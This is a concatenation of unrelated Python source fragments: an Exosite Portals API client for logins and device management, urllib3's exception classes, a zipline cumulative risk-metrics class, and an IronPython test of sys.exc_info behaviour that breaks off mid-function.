Instantiate the Portals object with user/password authentication
then call this function. The resultant object will be a Portals
object that uses token authentication for all future calls
instead of using user/password credentials.
Examples:
# for interactive mode, get a password prompt, a token
# and a logged-in Portals object
token, B = Portals.login_to_portal( domain=<domain>,
portal_name=<portal>,
user=<user/email>
)
# for non-interactive mode, passing in user password to
# get a token and a logged-in Portals object
token, B = Portals.login_to_portal( domain=<domain>,
portal_name=<portal>,
user=<user/email>,
credential=<password>
)
# for non-interactive mode, passing in token to get a
# logged-in Portals object
token, B = Portals.login_to_portal( domain=<domain>,
portal_name=<portal>,
user=<user/email>,
credential=<token>,
use_token=True
)
# for non-interactive mode, passing in token and id
# to get a Portals object that doesn't need to make any
# Portals API calls.
token, B = Portals.login_to_portal( domain=<domain>,
portal_name=<portal>,
user=<user/email>,
credential=<token>,
use_token=True,
portal_id=<portal_id>,
portal_rid=<portal_rid>
)
"""
if domain is None:
domain = _input("Enter domain: ")
if portal_name is None:
portal_name = _input("Enter name of Portal: ")
if user is None:
user = _input("Enter username: ")
if None is credential:
# interactive mode
B = Portals( domain=domain,
portal_name=portal_name,
user=user,
debug=debug
)
token = B.get_user_token()
# print("Got token {0}".format(token))
elif not None is credential and not use_token:
# non-interactive, using a user-password to retrieve token
B = Portals( domain=domain,
portal_name=portal_name,
user=user,
auth=credential,
debug=debug
)
token = B.get_user_token()
elif not None is credential and use_token:
# non-interactive, mainly just need to instantiate an object.
B = Portals( domain=domain,
portal_name=portal_name,
user=user,
auth=credential,
use_token=use_token,
debug=debug
)
token = credential
if portal_id is None: # or portal_rid is None:
B.get_portal_by_name(B.portal_name())
else:
B.set_portal_id(portal_id)
# B.set_portal_rid(portal_rid)
if get_devices:
B.map_aliases_to_device_objects()
return token, B
def rename_device(self, device_obj, new_name):
"""
Returns 'device object' of newly created device.
http://docs.exosite.com/portals/#update-device
http://docs.exosite.com/portals/#device-object
"""
device_obj['info']['description']['name'] = new_name
return self.update_device(device_obj)
def add_device_with_name_location_timezone( self,
model,
serial,
name,
location,
timezone):
"""
This method wraps the self.add_device() and self.rename_device()
methods.
Returns device object.
"""
retval = None
retval = self.add_location_timezone_to_device(
self.rename_device(
self.add_device(
model,
serial),
name
),
location,
timezone
)
return retval
def add_location_timezone_to_device(self, device_obj, location, timezone):
"""
Returns 'device object' with updated location
http://docs.exosite.com/portals/#update-device
http://docs.exosite.com/portals/#device-object
"""
dictify_device_meta(device_obj)
device_obj['info']['description']['meta']['location'] = location
device_obj['info']['description']['meta']['Location'] = location
device_obj['info']['description']['meta']['timezone'] = timezone
device_obj['info']['description']['meta']['Timezone'] = timezone
return self.update_device(device_obj)
def delete_device(self, rid):
"""
Deletes device object with given rid
http://docs.exosite.com/portals/#delete-device
"""
headers = {
'User-Agent': self.user_agent(),
'Content-Type': self.content_type()
}
headers.update(self.headers())
r = requests.delete( self.portals_url()+'/devices/'+rid,
headers=headers,
auth=self.auth())
if HTTP_STATUS.NO_CONTENT == r.status_code:
print("Successfully deleted device with rid: {0}".format(rid))
return True
else:
print("Something went wrong: <{0}>: {1}".format(
r.status_code, r.reason))
r.raise_for_status()
return False
def list_portal_data_sources(self):
"""
List data sources of the portal.
http://docs.exosite.com/portals/#list-portal-data-source
"""
headers = {
'User-Agent': self.user_agent(),
}
headers.update(self.headers())
r = requests.get( self.portals_url()+'/portals/'+self.portal_id()+'/data-sources',
headers=headers,
auth=self.auth()
)
if HTTP_STATUS.OK == r.status_code:
return r.json()
else:
print("Something went wrong: <{0}>: {1}".format(
r.status_code, r.reason))
return {}
def list_device_data_sources(self, device_rid):
"""
List data sources of a portal device with rid 'device_rid'.
http://docs.exosite.com/portals/#list-device-data-source
"""
headers = {
'User-Agent': self.user_agent(),
}
headers.update(self.headers())
r = requests.get( self.portals_url()+'/devices/'+device_rid+'/data-sources',
headers=headers, auth=self.auth())
if HTTP_STATUS.OK == r.status_code:
return r.json()
else:
print("Something went wrong: <{0}>: {1}".format(
r.status_code, r.reason))
return None
def get_data_source_bulk_request(self, rids, limit=5):
"""
This grabs each datasource and its multiple datapoints for a particular device.
"""
headers = {
'User-Agent': self.user_agent(),
'Content-Type': self.content_type()
}
headers.update(self.headers())
r = requests.get( self.portals_url()
+'/data-sources/['
+",".join(rids)
+']/data?limit='+str(limit),
headers=headers, auth=self.auth())
if HTTP_STATUS.OK == r.status_code:
return r.json()
else:
print("Something went wrong: <{0}>: {1}".format(
r.status_code, r.reason))
return {}
def get_cik(self, rid):
"""
Retrieves the CIK key for a device.
"""
device = self.get_device(rid)
return device['info']['key']
def get_all_devices_in_portal(self):
"""
This loops through the get_multiple_devices method 10 rids at a time.
"""
rids = self.get_portal_by_name(
self.portal_name()
)[2][1]['info']['aliases']
# print("RIDS: {0}".format(rids))
device_rids = [ rid.strip() for rid in rids ]
blocks_of_ten = [ device_rids[x:x+10] for x in range(0, len(device_rids), 10) ]
devices = []
for block_of_ten in blocks_of_ten:
retval = self.get_multiple_devices(block_of_ten)
if retval is not None:
devices.extend( retval )
else:
print("Not adding to device list: {!r}".format(retval))
# Parse 'meta' key's raw string values for each device
for device in devices:
dictify_device_meta(device)
return devices
def map_aliases_to_device_objects(self):
"""
A device object knows its rid, but not its alias.
A portal object knows its device rids and aliases.
This function adds an 'portals_aliases' key to all of the
device objects so they can be sorted by alias.
"""
all_devices = self.get_all_devices_in_portal()
for dev_o in all_devices:
dev_o['portals_aliases'] = self.get_portal_by_name(
self.portal_name()
)[2][1]['info']['aliases'][ dev_o['rid'] ]
return all_devices
def search_for_devices_by_serial_number(self, sn):
"""
Returns a list of device objects that match the serial number
in param 'sn'.
This will match partial serial numbers.
"""
import re
sn_search = re.compile(sn)
matches = []
for dev_o in self.get_all_devices_in_portal():
# print("Checking {0}".format(dev_o['sn']))
try:
if sn_search.match(dev_o['sn']):
matches.append(dev_o)
except TypeError as err:
print("Problem checking device {!r}: {!r}".format(
dev_o['info']['description']['name'],
str(err)))
return matches
def print_device_list(self, device_list=None):
"""
Optional parameter is a list of device objects. If omitted, will
just print all portal devices objects.
"""
dev_list = device_list if device_list is not None else self.get_all_devices_in_portal()
for dev in dev_list:
print('{0}\t\t{1}\t\t{2}'.format(
dev['info']['description']['name'],
dev['sn'],
dev['portals_aliases']\
if len(dev['portals_aliases']) != 1
else dev['portals_aliases'][0]
)
)
def print_sorted_device_list(self, device_list=None, sort_key='sn'):
"""
Takes in a sort key and prints the device list according to that sort.
Default sorts on serial number.
Current supported sort options are:
- name
- sn
- portals_aliases
Can take optional device object list.
"""
dev_list = device_list if device_list is not None else self.get_all_devices_in_portal()
sorted_dev_list = []
if sort_key == 'sn':
sort_keys = [ k[sort_key] for k in dev_list if k[sort_key] is not None ]
sort_keys = sorted(sort_keys)
for key in sort_keys:
sorted_dev_list.extend([ d for d in dev_list if d['sn'] == key ])
elif sort_key == 'name':
sort_keys = [ k['info']['description'][sort_key]\
for k in dev_list if k['info']['description'][sort_key] is not None ]
sort_keys = sorted(sort_keys)
for key in sort_keys:
sorted_dev_list.extend( [ d for d in dev_list\
if d['info']['description'][sort_key] == key
]
)
elif sort_key == 'portals_aliases':
sort_keys = [ k[sort_key] for k in dev_list if k[sort_key] is not None ]
sort_keys = sorted(sort_keys)
for key in sort_keys:
sorted_dev_list.extend([ d for d in dev_list if d[sort_key] == key ])
else:
print("Sort key {!r} not recognized.".format(sort_key))
sort_keys = None
self.print_device_list(device_list=sorted_dev_list)
def get_user_id_from_email(self, email):
""" Uses the get-all-user-accounts Portals API to retrieve the
user-id by supplying an email. """
accts = self.get_all_user_accounts()
for acct in accts:
if acct['email'] == email:
return acct['id']
return None
def get_user_permission_from_email(self, email):
""" Returns a user's permissions object when given the user email."""
_id = self.get_user_id_from_email(email)
return self.get_user_permission(_id)
def add_dplist_permission_for_user_on_portal(self, user_email, portal_id):
""" Adds the 'd_p_list' permission to a user object when provided
a user_email and portal_id."""
_id = self.get_user_id_from_email(user_email)
print(self.get_user_permission_from_email(user_email))
retval = self.add_user_permission( _id, json.dumps(
[{'access': 'd_p_list', 'oid':{'id': portal_id, 'type':'Portal'}}]
)
)
print(self.get_user_permission_from_email(user_email))
return retval
def get_portal_cik(self, portal_name):
""" Retrieves portal object according to 'portal_name' and
returns its cik. """
portal = self.get_portal_by_name(portal_name)
cik = portal[2][1]['info']['key']
return cik
| |
import socket
import warnings
from email.errors import MessageDefect
from http.client import IncompleteRead as httplib_IncompleteRead
from typing import TYPE_CHECKING, Callable, List, Optional, Tuple, Union
if TYPE_CHECKING:
from .connection import HTTPConnection
from .connectionpool import ConnectionPool
from .response import HTTPResponse
from .util.retry import Retry
# Base Exceptions
class HTTPError(Exception):
"""Base exception used by this module."""
pass
class HTTPWarning(Warning):
"""Base warning used by this module."""
pass
_TYPE_REDUCE_RESULT = Tuple[Callable[..., object], Tuple[object, ...]]
class PoolError(HTTPError):
"""Base exception for errors caused within a pool."""
def __init__(self, pool: "ConnectionPool", message: str) -> None:
self.pool = pool
super().__init__(f"{pool}: {message}")
def __reduce__(self) -> _TYPE_REDUCE_RESULT:
# For pickling purposes.
return self.__class__, (None, None)
class RequestError(PoolError):
"""Base exception for PoolErrors that have associated URLs."""
def __init__(self, pool: "ConnectionPool", url: str, message: str) -> None:
self.url = url
super().__init__(pool, message)
def __reduce__(self) -> _TYPE_REDUCE_RESULT:
# For pickling purposes.
return self.__class__, (None, self.url, None)
class SSLError(HTTPError):
"""Raised when SSL certificate fails in an HTTPS connection."""
pass
class ProxyError(HTTPError):
"""Raised when the connection to a proxy fails."""
# The original error is also available as __cause__.
original_error: Exception
def __init__(self, message: str, error: Exception) -> None:
super().__init__(message, error)
self.original_error = error
class DecodeError(HTTPError):
"""Raised when automatic decoding based on Content-Type fails."""
pass
class ProtocolError(HTTPError):
"""Raised when something unexpected happens mid-request/response."""
pass
#: Renamed to ProtocolError but aliased for backwards compatibility.
ConnectionError = ProtocolError
# Leaf Exceptions
class MaxRetryError(RequestError):
"""Raised when the maximum number of retries is exceeded.
:param pool: The connection pool
:type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
:param string url: The requested Url
:param exceptions.Exception reason: The underlying error
"""
def __init__(
self, pool: "ConnectionPool", url: str, reason: Optional[Exception] = None
) -> None:
self.reason = reason
message = f"Max retries exceeded with url: {url} (Caused by {reason!r})"
super().__init__(pool, url, message)
class HostChangedError(RequestError):
"""Raised when an existing pool gets a request for a foreign host."""
def __init__(
self, pool: "ConnectionPool", url: str, retries: Union["Retry", int] = 3
) -> None:
message = f"Tried to open a foreign host with url: {url}"
super().__init__(pool, url, message)
self.retries = retries
class TimeoutStateError(HTTPError):
"""Raised when passing an invalid state to a timeout"""
pass
class TimeoutError(HTTPError):
"""Raised when a socket timeout error occurs.
Catching this error will catch both :exc:`ReadTimeoutErrors
<ReadTimeoutError>` and :exc:`ConnectTimeoutErrors <ConnectTimeoutError>`.
"""
pass
class ReadTimeoutError(TimeoutError, RequestError):
"""Raised when a socket timeout occurs while receiving data from a server"""
pass
# This timeout error does not have a URL attached and needs to inherit from the
# base HTTPError
class ConnectTimeoutError(TimeoutError):
"""Raised when a socket timeout occurs while connecting to a server"""
pass
class NewConnectionError(ConnectTimeoutError, HTTPError):
"""Raised when we fail to establish a new connection. Usually ECONNREFUSED."""
def __init__(self, conn: "HTTPConnection", message: str) -> None:
self.conn = conn
super().__init__(f"{conn}: {message}")
@property
def pool(self) -> "HTTPConnection":
warnings.warn(
"The 'pool' property is deprecated and will be removed "
"in a later urllib3 v2.x release. use 'conn' instead.",
DeprecationWarning,
stacklevel=2,
)
return self.conn
class NameResolutionError(NewConnectionError):
"""Raised when host name resolution fails."""
def __init__(self, host: str, conn: "HTTPConnection", reason: socket.gaierror):
message = f"Failed to resolve '{host}' ({reason})"
super().__init__(conn, message)
class EmptyPoolError(PoolError):
"""Raised when a pool runs out of connections and no more are allowed."""
pass
class FullPoolError(PoolError):
"""Raised when we try to add a connection to a full pool in blocking mode."""
pass
class ClosedPoolError(PoolError):
"""Raised when a request enters a pool after the pool has been closed."""
pass
class LocationValueError(ValueError, HTTPError):
"""Raised when there is something wrong with a given URL input."""
pass
class LocationParseError(LocationValueError):
"""Raised when get_host or similar fails to parse the URL input."""
def __init__(self, location: str) -> None:
message = f"Failed to parse: {location}"
super().__init__(message)
self.location = location
class URLSchemeUnknown(LocationValueError):
"""Raised when a URL input has an unsupported scheme."""
def __init__(self, scheme: str):
message = f"Not supported URL scheme {scheme}"
super().__init__(message)
self.scheme = scheme
class ResponseError(HTTPError):
"""Used as a container for an error reason supplied in a MaxRetryError."""
GENERIC_ERROR = "too many error responses"
SPECIFIC_ERROR = "too many {status_code} error responses"
class SecurityWarning(HTTPWarning):
"""Warned when performing security reducing actions"""
pass
class InsecureRequestWarning(SecurityWarning):
"""Warned when making an unverified HTTPS request."""
pass
class SystemTimeWarning(SecurityWarning):
"""Warned when system time is suspected to be wrong"""
pass
class InsecurePlatformWarning(SecurityWarning):
"""Warned when certain TLS/SSL configuration is not available on a platform."""
pass
class SNIMissingWarning(HTTPWarning):
"""Warned when making a HTTPS request without SNI available."""
pass
class DependencyWarning(HTTPWarning):
"""
Warned when an attempt is made to import a module with missing optional
dependencies.
"""
pass
class ResponseNotChunked(ProtocolError, ValueError):
"""Response needs to be chunked in order to read it as chunks."""
pass
class BodyNotHttplibCompatible(HTTPError):
"""
Body should be :class:`http.client.HTTPResponse` like
(have an fp attribute which returns raw chunks) for read_chunked().
"""
pass
class IncompleteRead(HTTPError, httplib_IncompleteRead):
"""
Response length doesn't match expected Content-Length
Subclass of :class:`http.client.IncompleteRead` to allow int value
for ``partial`` to avoid creating large objects on streamed reads.
"""
def __init__(self, partial: int, expected: int) -> None:
self.partial = partial # type: ignore[assignment]
self.expected = expected
def __repr__(self) -> str:
return "IncompleteRead(%i bytes read, %i more expected)" % (
self.partial, # type: ignore[str-format]
self.expected,
)
class InvalidChunkLength(HTTPError, httplib_IncompleteRead):
"""Invalid chunk length in a chunked response."""
def __init__(self, response: "HTTPResponse", length: bytes) -> None:
self.partial: int = response.tell() # type: ignore[assignment]
self.expected: Optional[int] = response.length_remaining
self.response = response
self.length = length
def __repr__(self) -> str:
return "InvalidChunkLength(got length %r, %i bytes read)" % (
self.length,
self.partial,
)
class InvalidHeader(HTTPError):
"""The header provided was somehow invalid."""
pass
class ProxySchemeUnknown(AssertionError, URLSchemeUnknown):
"""ProxyManager does not support the supplied scheme"""
# TODO(t-8ch): Stop inheriting from AssertionError in v2.0.
def __init__(self, scheme: Optional[str]) -> None:
# 'localhost' is here because our URL parser parses
# localhost:8080 -> scheme=localhost, remove if we fix this.
if scheme == "localhost":
scheme = None
if scheme is None:
message = "Proxy URL had no scheme, should start with http:// or https://"
else:
message = f"Proxy URL had unsupported scheme {scheme}, should use http:// or https://"
super().__init__(message)
class ProxySchemeUnsupported(ValueError):
"""Fetching HTTPS resources through HTTPS proxies is unsupported"""
pass
class HeaderParsingError(HTTPError):
"""Raised by assert_header_parsing, but we convert it to a log.warning statement."""
def __init__(
self, defects: List[MessageDefect], unparsed_data: Optional[Union[bytes, str]]
) -> None:
message = f"{defects or 'Unknown'}, unparsed data: {unparsed_data!r}"
super().__init__(message)
class UnrewindableBodyError(HTTPError):
"""urllib3 encountered an error when trying to rewind a body"""
pass
| |
#
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import logbook
import numpy as np
import pandas as pd
from pandas.tseries.tools import normalize_date
from six import iteritems
from . risk import (
check_entry,
choose_treasury
)
from empyrical import (
alpha_beta_aligned,
annual_volatility,
cum_returns,
downside_risk,
max_drawdown,
sharpe_ratio,
sortino_ratio,
)
log = logbook.Logger('Risk Cumulative')
choose_treasury = functools.partial(choose_treasury, lambda *args: '10year',
compound=False)
class RiskMetricsCumulative(object):
"""
:Usage:
Instantiate RiskMetricsCumulative once.
Call update() method on each dt to update the metrics.
"""
METRIC_NAMES = (
'alpha',
'beta',
'sharpe',
'algorithm_volatility',
'benchmark_volatility',
'downside_risk',
'sortino',
)
def __init__(self, sim_params, treasury_curves, trading_calendar,
create_first_day_stats=False):
self.treasury_curves = treasury_curves
self.trading_calendar = trading_calendar
self.start_session = sim_params.start_session
self.end_session = sim_params.end_session
self.sessions = trading_calendar.sessions_in_range(
self.start_session, self.end_session
)
# Hold on to the trading day before the start,
# used for index of the zero return value when forcing returns
# on the first day.
self.day_before_start = self.start_session - self.sessions.freq
last_day = normalize_date(sim_params.end_session)
if last_day not in self.sessions:
last_day = pd.tseries.index.DatetimeIndex(
[last_day]
)
self.sessions = self.sessions.append(last_day)
self.sim_params = sim_params
self.create_first_day_stats = create_first_day_stats
cont_index = self.sessions
self.cont_index = cont_index
self.cont_len = len(self.cont_index)
empty_cont = np.full(self.cont_len, np.nan)
self.algorithm_returns_cont = empty_cont.copy()
self.benchmark_returns_cont = empty_cont.copy()
self.algorithm_cumulative_leverages_cont = empty_cont.copy()
self.mean_returns_cont = empty_cont.copy()
self.annualized_mean_returns_cont = empty_cont.copy()
self.mean_benchmark_returns_cont = empty_cont.copy()
self.annualized_mean_benchmark_returns_cont = empty_cont.copy()
# The returns at a given time are read and reset from the respective
# returns container.
self.algorithm_returns = None
self.benchmark_returns = None
self.mean_returns = None
self.annualized_mean_returns = None
self.mean_benchmark_returns = None
self.annualized_mean_benchmark_returns = None
self.algorithm_cumulative_returns = empty_cont.copy()
self.benchmark_cumulative_returns = empty_cont.copy()
self.algorithm_cumulative_leverages = empty_cont.copy()
self.excess_returns = empty_cont.copy()
self.latest_dt_loc = 0
self.latest_dt = cont_index[0]
self.benchmark_volatility = empty_cont.copy()
self.algorithm_volatility = empty_cont.copy()
self.beta = empty_cont.copy()
self.alpha = empty_cont.copy()
self.sharpe = empty_cont.copy()
self.downside_risk = empty_cont.copy()
self.sortino = empty_cont.copy()
self.drawdowns = empty_cont.copy()
self.max_drawdowns = empty_cont.copy()
self.max_drawdown = 0
self.max_leverages = empty_cont.copy()
self.max_leverage = 0
self.current_max = -np.inf
self.daily_treasury = pd.Series(index=self.sessions)
self.treasury_period_return = np.nan
self.num_trading_days = 0
def update(self, dt, algorithm_returns, benchmark_returns, leverage):
# Keep track of latest dt for use in to_dict and other methods
# that report current state.
self.latest_dt = dt
dt_loc = self.cont_index.get_loc(dt)
self.latest_dt_loc = dt_loc
self.algorithm_returns_cont[dt_loc] = algorithm_returns
self.algorithm_returns = self.algorithm_returns_cont[:dt_loc + 1]
self.num_trading_days = len(self.algorithm_returns)
if self.create_first_day_stats:
if len(self.algorithm_returns) == 1:
self.algorithm_returns = np.append(0.0, self.algorithm_returns)
self.algorithm_cumulative_returns[dt_loc] = cum_returns(
self.algorithm_returns
)[-1]
algo_cumulative_returns_to_date = \
self.algorithm_cumulative_returns[:dt_loc + 1]
self.mean_returns_cont[dt_loc] = \
algo_cumulative_returns_to_date[dt_loc] / self.num_trading_days
self.mean_returns = self.mean_returns_cont[:dt_loc + 1]
self.annualized_mean_returns_cont[dt_loc] = \
self.mean_returns_cont[dt_loc] * 252
self.annualized_mean_returns = \
self.annualized_mean_returns_cont[:dt_loc + 1]
if self.create_first_day_stats:
if len(self.mean_returns) == 1:
self.mean_returns = np.append(0.0, self.mean_returns)
self.annualized_mean_returns = np.append(
0.0, self.annualized_mean_returns)
self.benchmark_returns_cont[dt_loc] = benchmark_returns
self.benchmark_returns = self.benchmark_returns_cont[:dt_loc + 1]
if self.create_first_day_stats:
if len(self.benchmark_returns) == 1:
self.benchmark_returns = np.append(0.0, self.benchmark_returns)
self.benchmark_cumulative_returns[dt_loc] = cum_returns(
self.benchmark_returns
)[-1]
benchmark_cumulative_returns_to_date = \
self.benchmark_cumulative_returns[:dt_loc + 1]
self.mean_benchmark_returns_cont[dt_loc] = \
benchmark_cumulative_returns_to_date[dt_loc] / \
self.num_trading_days
self.mean_benchmark_returns = self.mean_benchmark_returns_cont[:dt_loc]
self.annualized_mean_benchmark_returns_cont[dt_loc] = \
self.mean_benchmark_returns_cont[dt_loc] * 252
self.annualized_mean_benchmark_returns = \
self.annualized_mean_benchmark_returns_cont[:dt_loc + 1]
self.algorithm_cumulative_leverages_cont[dt_loc] = leverage
self.algorithm_cumulative_leverages = \
self.algorithm_cumulative_leverages_cont[:dt_loc + 1]
if self.create_first_day_stats:
if len(self.algorithm_cumulative_leverages) == 1:
self.algorithm_cumulative_leverages = np.append(
0.0,
self.algorithm_cumulative_leverages)
if not len(self.algorithm_returns) and len(self.benchmark_returns):
message = "Mismatch between benchmark_returns ({bm_count}) and \
algorithm_returns ({algo_count}) in range {start} : {end} on {dt}"
message = message.format(
bm_count=len(self.benchmark_returns),
algo_count=len(self.algorithm_returns),
start=self.start_session,
end=self.end_session,
dt=dt
)
raise Exception(message)
self.update_current_max()
self.benchmark_volatility[dt_loc] = annual_volatility(
self.benchmark_returns
)
self.algorithm_volatility[dt_loc] = annual_volatility(
self.algorithm_returns
)
# caching the treasury rates for the minutely case is a
# big speedup, because it avoids searching the treasury
# curves on every minute.
# In both minutely and daily, the daily curve is always used.
treasury_end = dt.replace(hour=0, minute=0)
if np.isnan(self.daily_treasury[treasury_end]):
treasury_period_return = choose_treasury(
self.treasury_curves,
self.start_session,
treasury_end,
self.trading_calendar,
)
self.daily_treasury[treasury_end] = treasury_period_return
self.treasury_period_return = self.daily_treasury[treasury_end]
self.excess_returns[dt_loc] = (
self.algorithm_cumulative_returns[dt_loc] -
self.treasury_period_return)
self.alpha[dt_loc], self.beta[dt_loc] = alpha_beta_aligned(
self.algorithm_returns,
self.benchmark_returns,
)
self.sharpe[dt_loc] = sharpe_ratio(
self.algorithm_returns,
)
self.downside_risk[dt_loc] = downside_risk(
self.algorithm_returns
)
self.sortino[dt_loc] = sortino_ratio(
self.algorithm_returns,
_downside_risk=self.downside_risk[dt_loc]
)
self.max_drawdown = max_drawdown(
self.algorithm_returns
)
self.max_drawdowns[dt_loc] = self.max_drawdown
self.max_leverage = self.calculate_max_leverage()
self.max_leverages[dt_loc] = self.max_leverage
def to_dict(self):
"""
Creates a dictionary representing the state of the risk report.
Returns a dict object of the form:
"""
dt = self.latest_dt
dt_loc = self.latest_dt_loc
period_label = dt.strftime("%Y-%m")
rval = {
'trading_days': self.num_trading_days,
'benchmark_volatility':
self.benchmark_volatility[dt_loc],
'algo_volatility':
self.algorithm_volatility[dt_loc],
'treasury_period_return': self.treasury_period_return,
# Though the two following keys say period return,
# they would be more accurately called the cumulative return.
# However, the keys need to stay the same, for now, for backwards
# compatibility with existing consumers.
'algorithm_period_return':
self.algorithm_cumulative_returns[dt_loc],
'benchmark_period_return':
self.benchmark_cumulative_returns[dt_loc],
'beta': self.beta[dt_loc],
'alpha': self.alpha[dt_loc],
'sharpe': self.sharpe[dt_loc],
'sortino': self.sortino[dt_loc],
'excess_return': self.excess_returns[dt_loc],
'max_drawdown': self.max_drawdown,
'max_leverage': self.max_leverage,
'period_label': period_label
}
return {k: (None if check_entry(k, v) else v)
for k, v in iteritems(rval)}
def __repr__(self):
statements = []
for metric in self.METRIC_NAMES:
value = getattr(self, metric)[-1]
if isinstance(value, list):
if len(value) == 0:
value = np.nan
else:
value = value[-1]
statements.append("{m}:{v}".format(m=metric, v=value))
return '\n'.join(statements)
def update_current_max(self):
if len(self.algorithm_cumulative_returns) == 0:
return
current_cumulative_return = \
self.algorithm_cumulative_returns[self.latest_dt_loc]
if self.current_max < current_cumulative_return:
self.current_max = current_cumulative_return
def calculate_max_leverage(self):
# The leverage is defined as: the gross_exposure/net_liquidation
# gross_exposure = long_exposure + abs(short_exposure)
# net_liquidation = ending_cash + long_exposure + short_exposure
cur_leverage = self.algorithm_cumulative_leverages_cont[
self.latest_dt_loc]
return max(cur_leverage, self.max_leverage)
| |
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# Test that sys.exc_info() is properly set.
from iptest.assert_util import *
import sys
# Rules:
# 1) thread has a current exception
# 2) except block sets current exception
# 3) when method returns (either normally, via exception, or via generator),
# it restores the current exception to what it was on function entry.
#
# exc_info() is pretty useless in a finally block. It may be non-null, but it's value
# depends on how exactly we got to execute the finally. In fact, in a finally, exc_info
# may be non-null, but not for the current exception.
# Or it may be null, even when there's an outstanding exception. $$$ is that true?
# return the current exception arg or None
# raise ValueError(15) ; E() returns 15
def E():
t = sys.exc_info()[1]
if t == None: return None
return t[0]
# helper for easy asserts on E
def A(v):
AreEqual(E(), v)
#--------------------------------------
# Tests
def test_simple():
A(None)
try:
raise ValueError(15)
except:
A(15)
A(15) # still valid after exception block, but still in function
# test setting in except params
def test_excep_params():
def t(): # called as argument in except clause
A(63)
return TypeError
def f():
try:
raise ValueError(63)
except t(): # not matching
Assert(False)
try:
f()
except:
A(63)
# raise new ex out of catch; check in finally
def test_except_rethrow():
def f():
try:
raise ValueError(81)
except:
A(81)
# raise a new exception type. exc_info doesn't get updated
# until we hit a new except block
raise ValueError(43)
finally:
# still using the original exc since we haven't hit a new exc block yet.
A(81)
try:
f()
except:
A(43)
A(43)
# finally, same function as active except, exception path
def test_fin_except():
A(None)
try:
raise ValueError(20)
except:
A(20)
finally:
A(20) # active from except block
A(20) # still active
# finally doesnt see exc_info when there's no catcher.
def test_fin_except2():
def f1():
A(None)
raise ValueError(20)
def f2():
A(None)
try:
f1() # throw from a different function
Assert(False)
finally:
# we should be here via the exceptional path.
# but since there's no except block in here, exc_info not set.
A(None)
Assert(False)
try:
f2()
except:
A(20)
A(20)
# Finally w/o an except block does not see the exception.
# compare to test_fin_except()
def helper_fin_no_except():
A(None)
try:
raise ValueError(15)
finally:
A(None) # no except block, so not set.
def test_fin_no_except():
try:
helper_fin_no_except()
except:
A(15)
A(15)
#
# inactive except block.
# The mere presence of an except block is enough to set exc_info(). We don't
# need to actually execute the handlers.
def helper_fin_inactive():
A(None)
try:
raise ValueError(20)
except TypeError: # mismatched, still causes exc_info() to be set
Assert(False)
finally:
A(20) # still set even from inactive block
A(20) # still active
def test_fin_inactive():
try:
helper_fin_inactive()
except: # prevent from going unhandled
A(20)
# Non exception path
def test_fin_normal():
A(None)
try:
pass
finally:
A(None)
A(None)
# Nested
def test_nested():
try:
try:
try:
raise ValueError(15)
except:
A(15)
A(15)
except:
Assert(False)
A(15)
try:
A(15)
# Now raise a new exception. This becomes the current exc_info() value.
raise ValueError(20)
except:
A(20)
A(20)
except:
Assert(False)
A(20)
# Child function inherits exc_info() from parent, but can't change parents.
# only changed by a function having an except block.
def test_call():
def f():
A(7) # parent is already in a except block.
try:
raise ValueError(20)
except:
A(20)
A(20)
# will be restored to 7 on function return
#
try:
raise ValueError(7)
except:
A(7)
f()
A(7)
# Test with multiple calls and ensure value is restored
def test_call2():
def f3a():
A(55)
try:
raise ValueError(11)
except:
A(11)
A(11)
def f3b():
A(55)
try:
raise ValueError(22)
except:
A(22)
return # return from Except, swallows Ex
Assert(False)
def f2():
A(55)
f3a()
A(55)
f3b()
A(55)
#
try:
A(None)
raise ValueError(55)
except:
A(55)
f2()
A(55)
# Still set in finally on return.
def test_ex_fin():
try:
try:
raise ValueError(25)
except:
A(25)
return 7
finally:
# still set from the except block
A(25)
# like test_ex_fin, but when we split into an inner function, it gets reset
def test_funcs():
def f():
try:
try:
raise ValueError(27)
except:
A(27)
raise # rethrow
finally:
# on exceptional path. Since this function had a except clause
# in the function, exc_info() is still set.
A(27)
try:
try:
f()
finally:
A(None) # exc_info reset since thrown from different function
except:
A(27)
pass
# ???
# Tests splitting across multiple functions to show reset
def f():
pass
# Test with exc_info and generators.
# The first yield in the except block is a return from the function and clears
# the current exception status.
def test_generator():
def f():
try:
raise ValueError(3)
except:
A(3)
yield 1 # this will reset exc_info
A(None)
yield 2
A(5) # pick up from caller
try:
yield 3 # generator will call next when exc_info=Val(6) here.
finally:
# We're in the non-exception path of a finally, but still have exc_info set since
# generator was called from a catch block.
A(6)
yield 4
A(6) # still set from generator's caller
A(6) #
yield 5
# call the generator
g=f()
AreEqual(next(g), 1)
A(None) # generator's exc value shouldn't taint the caller
AreEqual(next(g), 2)
A(None) # clear after returning from yield
try:
raise ValueError(5) # New exception!
except:
A(5)
# Now call back into the generator with a new exc_info!
AreEqual(next(g), 3)
A(5)
A(5)
try:
A(5)
raise ValueError(6) # New exception
except:
A(6)
# this will execute a finally in the generator.
AreEqual(next(g), 4)
A(6)
A(6)
AreEqual(next(g), 5)
# throw out of generator
# ensure that exc_info() is cleared.
def test_gen_throw():
def f():
try:
yield 1 # caller will g.Throw() from here
except:
A(87)
raise ValueError(22) # throw new error
#
g=f()
A(None)
AreEqual(next(g), 1)
A(None)
try:
try:
g.throw(ValueError(87))
Assert(False)
finally:
# exceptional path.
# exc_info should have been cleared on exiting generator.
A(None)
except:
A(22)
A(22)
#---------------------------------------------------------------------
#
# Test sys.exc_clear(), which was added in Python 2.3
# This clears the last exception status.
#
#---------------------------------------------------------------------
# simple case of clear in an except block.
def test_clear_simple():
try:
raise ValueError(12)
except:
A(12)
sys.exc_clear()
A(None)
A(None)
# cases with nesting.
def test_clear_nested():
try:
